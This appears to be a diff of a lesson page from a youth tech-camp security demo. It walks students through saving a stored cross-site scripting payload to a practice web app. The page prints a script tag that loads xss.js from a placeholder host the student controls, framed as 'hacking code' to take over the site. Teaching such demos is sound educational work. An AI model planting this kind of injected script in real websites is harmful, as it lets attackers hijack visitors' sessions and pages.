RRC-ACE-Outreach/TechCamp/TechCamp - Web App/4 Internet Security Demo.md

 When you have logged in using your “account”, it’s time to save some code to the website so that it can take over!

 #### Hacking Code 2
 Before we can the next piece of hacking code, we need to change something.
-The part of the text that says `<YOUR_CONTAINER_ADDRESS>` is the name of the computer you wish to load your `xss.js` from.
-You will need to replace the `<YOUR_CONTAINER_ADDRESS>` with the text you see when you look at your website.
-This will load `xss.js` from your server if/when you have set it up.
+The part of the text that says `<YOUR_CONTAINER_ADDRESS>` is the name of the computer you wish to load your `xss.js` from. **You will need to replace the `<YOUR_CONTAINER_ADDRESS>` with the text you see when you look at your website.** This will load `xss.js` from your server if/when you have set it up, which if was a real hack, could be injected into any website around the world (doesn't work that way in real life anymore, however, thanx to protections in most modern browsers).
 ```
 <script language=javascript src=http://<YOUR_CONTAINER_ADDRESS>/xss.js></script>
 ```